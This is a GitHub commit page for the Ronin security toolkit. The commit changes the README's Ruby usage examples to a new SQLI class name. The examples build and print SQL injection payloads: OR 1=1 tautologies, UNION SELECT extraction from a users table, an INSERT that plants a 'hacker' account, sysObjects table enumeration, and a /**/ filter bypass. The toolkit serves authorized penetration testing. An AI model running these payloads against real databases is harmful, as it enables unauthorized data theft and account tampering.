Skip to content

Commit

Permalink
Use the new Ronin::Code::SQLI constant in the Examples.
Browse files Browse the repository at this point in the history
  • Loading branch information
postmodern committed Jun 27, 2023
1 parent 65e4f9e commit 087164a
Showing 1 changed file with 12 additions and 12 deletions.
24 changes: 12 additions & 12 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,7 @@ string.sql_decode
Injecting a `1=1` test into a Integer comparison:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.or { 1 == 1 }
puts sqli
# 1 OR 1=1
Expand All @@ -70,7 +70,7 @@ puts sqli
Injecting a `1=1` test into a String comparison:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.or { string(1) == string(1) }
puts sqli
# 1' OR '1'='1
Expand All @@ -79,7 +79,7 @@ puts sqli
Columns:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { admin == 1 }
puts sqli
# 1 AND admin=1
Expand All @@ -88,7 +88,7 @@ puts sqli
Clauses:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.or { 1 == 1 }.limit(0)
puts sqli
# 1 OR 1=1 LIMIT 0
Expand All @@ -97,7 +97,7 @@ puts sqli
Statements:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { 1 == 0 }
sqli.insert.into(:users).values('hacker','passw0rd','t')
puts sqli
Expand All @@ -107,7 +107,7 @@ puts sqli
Sub-Statements:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union { select(1,2,3,4,id).from(users) }
puts sqli
# 1 UNION SELECT (1,2,3,4,id) FROM users
Expand All @@ -116,7 +116,7 @@ puts sqli
Test if a table exists:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { select(count).from(:users) == 1 }
puts sqli
# 1 AND (SELECT COUNT(*) FROM users)=1
Expand All @@ -125,7 +125,7 @@ puts sqli
Create errors by using non-existent tables:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.and { non_existent_table == '1' }
puts sqli
# 1' AND non_existent_table='1
Expand All @@ -134,7 +134,7 @@ puts sqli
Dumping all values of a column:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.or { username.is_not(null) }.or { username == '' }
puts sqli
# 1' OR username IS NOT NULL OR username='
Expand All @@ -143,7 +143,7 @@ puts sqli
Enumerate through database table names:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and {
ascii(
lower(
Expand All @@ -160,7 +160,7 @@ puts sqli
Find user supplied tables via the `sysObjects` table:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union_all {
select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
}
Expand All @@ -171,7 +171,7 @@ puts sqli.to_sql(terminate: true)
Bypass filters using `/**/` instead of spaces:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union { select(1,2,3,4,id).from(users) }
puts sqli.to_sql(space: '/**/')
# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
Expand Down

0 comments on commit 087164a

Please sign in to comment.